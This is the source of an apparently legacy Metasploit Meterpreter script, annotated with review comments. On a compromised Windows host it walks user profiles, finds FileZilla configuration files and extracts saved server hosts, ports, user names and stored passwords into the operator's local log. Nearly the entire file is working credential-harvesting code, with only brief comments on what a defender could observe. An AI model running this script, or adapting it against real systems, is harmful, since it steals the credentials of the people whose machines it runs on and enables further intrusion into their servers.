Path: blob/master/scripts/meterpreter/get_filezilla_creds.rb
##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to improve this script, please try to port it as a post
# module instead. Thank you.
##
#
# Meterpreter script: enumerates user profile directories on a Windows
# target, looks for a FileZilla profile directory under each user's
# application-data path, parses sitemanager.xml and recentservers.xml with
# REXML, prints the server entries to the console and appends them to a
# local log file under Msf::Config.log_directory.
#
# Defensive view: the only files this script touches on the target are the
# two FileZilla XML files named in MAIN; reads of those files by anything
# other than FileZilla itself are the observable artefact on the host.

require "rexml/document"

#-------------------------------------------------------------------------------
# Options and Option Parsing
opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ],
  "-c" => [ false, "Return credentials." ]
)

get_credentials=false

# idx and val are unused: neither option takes an argument.
opts.parse(args) { |opt, idx, val|
  case opt
  when "-h"
    print_line "Meterpreter Script for extracting servers and credentials from Filezilla."
    print_line(opts.usage)
    raise Rex::Script::Completed
  when "-c"
    get_credentials=true
  end
}
### If we get here and have none of our flags true, then we'll just
### get credentials
# NOTE(review): this makes "-c" redundant — get_credentials is always true
# by the time MAIN runs, so the flag only documents intent.
if !(get_credentials)
  get_credentials=true
end

#-------------------------------------------------------------------------------
# Set General Variables used in the script
@client = client
os = @client.sys.config.sysinfo['OS']
host = @client.sys.config.sysinfo['Computer']
# Create Filename info to be appended to downloaded files
# (timestamp uses %M = minutes, not %m = month; kept as-is for compatibility
# with existing log names)
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
# Create a directory for the logs; host comes from the target and is passed
# through clean_path before it becomes part of a local filesystem path.
logs = ::File.join(Msf::Config.log_directory, 'filezilla', Rex::FileUtils.clean_path(host + filenameinfo) )
# Create the log directory
::FileUtils.mkdir_p(logs)
# logfile name (local, on the attacker side)
dest = Rex::FileUtils.clean_path(logs + "/" + host + filenameinfo + ".txt")

#-------------------------------------------------------------------------------
# Function for checking if a FileZilla profile directory is present.
#
# path - application-data directory to scan. No separator is inserted before
#        the entry name, so path is expected to already end with a backslash
#        (enum_users builds it that way).
#
# Returns the full path of the first directory entry whose name matches
# /FileZilla/, or nil if none is found.
def check_filezilla(path)
  found = nil
  @client.fs.dir.foreach(path) do |x|
    next if x =~ /^(\.|\.\.)$/
    if x =~ (/FileZilla/)
      ### If we find the path, let's return it
      found = path + x
      return found
    end
  end
  return found
end

#-------------------------------------------------------------------------------

# Reads one FileZilla XML file from the target, prints every //Server entry
# and returns the same information as a single String for the log file.
#
# path     - FileZilla profile directory as returned by check_filezilla
# xml_file - file name inside that directory (sitemanager.xml or
#            recentservers.xml, see MAIN)
#
# Returns a String with the Host/Port/Logon/Protocol fields of every server.
# NOTE(review): the fragments appended to creds carry no newline or
# separator, so the returned string (and the log file) is one run-together
# line per call.
# NOTE(review): the "Pass" element is emitted verbatim; whether that value is
# directly readable depends on how the installed FileZilla version stores it
# — confirm before relying on the output.
def extract_saved_creds(path,xml_file)
  accounts_xml = ""
  creds = ""
  print_status("Reading #{xml_file} file...")
  ### path already points at the FileZilla profile directory, so only the
  ### file name is appended here
  account_file = @client.fs.file.new(path + "\\#{xml_file}", "rb")
  until account_file.eof?
    accounts_xml << account_file.read
  end
  # NOTE(review): close is not in an ensure block — an exception from read
  # or eof? leaves the remote handle open.
  account_file.close
  doc = (REXML::Document.new accounts_xml).root
  doc.elements.to_a("//Server").each do |e|
    print_status "\tHost: #{e.elements["Host"].text}"
    creds << "Host: #{e.elements["Host"].text}"
    print_status "\tPort: #{e.elements["Port"].text}"
    creds << "Port: #{e.elements["Port"].text}"
    # Logontype is matched as a string; 0 = anonymous, 1/4 carry a stored
    # password, 2/3 carry only a user name (per the branches below).
    # NOTE(review): the regexes are unanchored, so any value containing the
    # digit matches, not only the exact value.
    logon_type = e.elements["Logontype"].text
    if logon_type == "0"
      print_status "\tLogon Type: Anonymous"
      creds << "Logon Type: Anonymous"
    elsif logon_type =~ /1|4/
      print_status "\tUser: #{e.elements["User"].text}"
      creds << "User: #{e.elements["User"].text}"
      print_status "\tPassword: #{e.elements["Pass"].text}"
      creds << "Password: #{e.elements["Pass"].text}"
    elsif logon_type =~ /2|3/
      print_status "\tUser: #{e.elements["User"].text}"
      creds << "User: #{e.elements["User"].text}"
    end

    # Protocol codes other than 0/1/3/4 are silently skipped.
    proto = e.elements["Protocol"].text
    if proto == "0"
      print_status "\tProtocol: FTP"
      creds << "Protocol: FTP"
    elsif proto == "1"
      print_status "\tProtocol: SSH"
      creds << "Protocol: SSH"
    elsif proto == "3"
      print_status "\tProtocol: FTPS"
      creds << "Protocol: FTPS"
    elsif proto == "4"
      print_status "\tProtocol: FTPES"
      creds << "Protocol: FTPES"
    end
    print_status ""
    creds << ""

  end
  #
  return creds
end
#-------------------------------------------------------------------------------
# Function to enumerate the users if running as SYSTEM.
#
# os - the 'OS' string from sysinfo; used only to pick the profile layout.
#
# Returns an Array of Hashes with 'username' and 'userappdata' (the user's
# roaming application-data directory, ending in a backslash). When not
# running as SYSTEM only the current USERNAME is returned.
# NOTE(review): the OS check matches only strings containing 7, Vista or
# 2008; other OS strings (likely newer Windows versions) fall through to the
# legacy "Documents and Settings" layout — confirm against current sysinfo
# output.
def enum_users(os)
  users = []

  path4users = ""
  sysdrv = @client.sys.config.getenv('SystemDrive')

  # path2purple is the per-user suffix under which FileZilla's profile
  # directory is expected (name inherited from the Pidgin script this was
  # adapted from).
  if os =~ /7|Vista|2008/
    path4users = sysdrv + "\\users\\"
    path2purple = "\\AppData\\Roaming\\"
  else
    path4users = sysdrv + "\\Documents and Settings\\"
    path2purple = "\\Application Data\\"
  end

  if is_system?
    print_status("Running as SYSTEM extracting user list..")
    @client.fs.dir.foreach(path4users) do |u|
      userinfo = {}
      # Skip ".", ".." and the well-known non-user profile directories.
      next if u =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
      userinfo['username'] = u
      userinfo['userappdata'] = path4users + u + path2purple
      users << userinfo
    end
  else
    userinfo = {}
    uservar = @client.sys.config.getenv('USERNAME')
    userinfo['username'] = uservar
    userinfo['userappdata'] = path4users + uservar + path2purple
    users << userinfo
  end
  return users
end

################## MAIN ##################
# Windows only; any other platform prints an error and stops the script.
if client.platform == 'windows'
  print_status("Running Meterpreter FileZilla Credential harvester script")
  print_status("All services are logged at #{dest}")
  enum_users(os).each do |u|
    print_status("Checking if Filezilla profile is present for user :::#{u['username']}:::...")
    ### Find the path (if it exists) for this user,
    filezilla_path = check_filezilla(u['userappdata'])
    if filezilla_path
      print_status("FileZilla profile found!")
      ### Both files are read from filezilla_path; the result of each is
      ### written to the same local log file via file_local_write.
      xml_cfg_files = ['sitemanager.xml','recentservers.xml']
      if get_credentials
        xml_cfg_files.each do |xml_cfg_file|
          file_local_write(dest,extract_saved_creds(filezilla_path,xml_cfg_file))
        end
      end

    else
      print_error("Filezilla profile not found!")
    end
  end
else
  print_error("This version of Meterpreter is not supported with this Script!")
  raise Rex::Script::Completed
end